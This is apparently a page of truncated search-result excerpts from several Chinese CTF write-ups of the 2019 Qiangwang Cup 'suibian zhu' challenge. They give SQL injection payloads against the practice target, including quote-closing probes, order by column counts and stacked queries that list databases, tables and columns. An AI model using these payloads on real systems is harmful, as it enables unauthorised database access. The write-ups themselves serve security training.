ctf-[强网杯 2019]随便注 参考:https://www.cnblogs.com/LoYoHo00/articles/15246301.html (1)先判断传参方式--get**(2)判断闭合方式 1' 发现报错 ,确认是单引号闭合 (1" 和1 的回显结果相同,说明闭合方式不是双引号而是其他) 取材于某次真实环境渗透,只说一句话:开发和安全缺一不可 推测可能使用报错...
再试试查询1',看是否存在字符注入:?inject=1'# 利用order by查看有几个字段:?inject=1' order by 3#,?inject=1' order by 2# 可以知道有两个字段,接下来利用联合查询:?inject=1' union select 1,2# 发现select被过滤了,那咱们利用堆叠注入来查看数据库,表名,?inject=1';show databases;#,?inject=1'...
buuctf[强网杯 2019]随便注 1(超详细,三种解法) 第一种解法 堆叠注入 网页环境 判断是否是字符型注入1' 判断是否存在关键字过滤select 联合查询被过滤,只能用堆叠注入了 查看有几个字段1' order by 2# 正常回显1' order by 3# 回显报错,可以看出只有两个字段 查看所有数据库1'; show databases; 查看所有数据...
得到: array(1) { [0]=> string(11) "ctftraining"}array(1) { [0]=> string(18) "information_schema"}array(1) { [0]=> string(5) "mysql"}array(1) { [0]=> string(18) "performance_schema"}array(1) { [0]=> string(9) "supersqli"}array(1) { [0]=> string(4) "test"}...
CTF-Web-Sql注入-强网杯 2019]随便注 题目链接:BUUCTF 类型:sql注入 知识点:堆叠注入、mysql句柄操作(handler) 解题过程 方法1 测试注入点发现GET型字符注入, ?inject=1' or '1'='1 order by爆破字段2 ?inject=1' order by 3%23 配合union select发现过滤规则 ?inject=1' union select 1,2%23 没...
[CTF记录_强网杯 2019]随便注(三种方法) 做题思路 本题主要考察堆叠注入,算是比较经典的一道题,在GYCTF中也出现了本题的升级版 猜测这里的MySQL语句结构应该是: select * from words where id='$inject'; 1. 构造Payload:用单引号+分号闭合前面的语句,插入SQL语句,再用注释符注释掉后面的语句即可...
buuctf[强网杯 2019]随便注 1(超详细,三种解法),网页环境判断是否是字符型注入1'判断是否存在关键字过滤select联合查询被过滤,只能用堆叠注入了查看有几个字段正有一个字段。
收录于文集 BUUCTF · 71篇这题注入点很好找,跟之前easy sql一样 先1'直接回显,找到注入点 于是常用思路1' union select 1,2# 把过滤字符都返回出来了 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 下面就是sql(mysql)知识时间 show语句没有过滤,...
BUUCTF 随便注 启动靶机,随便输入数据 注入点位inject,url传参,不能使用sqlmap 提交后获取数据看不懂百度一下 利用堆叠注入 1';show databases;# 查询所有数据库 1';show tables;# 查询所有表 查询1919810931114514表中的所有列 表名用反引号包裹 1';show columns from `1919810931114514`;#...
CTF有个不成文的「规矩」,SQL注入漏洞的flag大部分都在当前使用的「表」中,这里我们使用堆叠注入直接查看当前使用的数据库中有哪些表,payload如下 0';show tables; -- a 当前数据库下有两个表:1919810931114514,words 2)获取字段 使用show 命令查看表中的「字段」,注意表名要用反引号包裹,payload如下: ...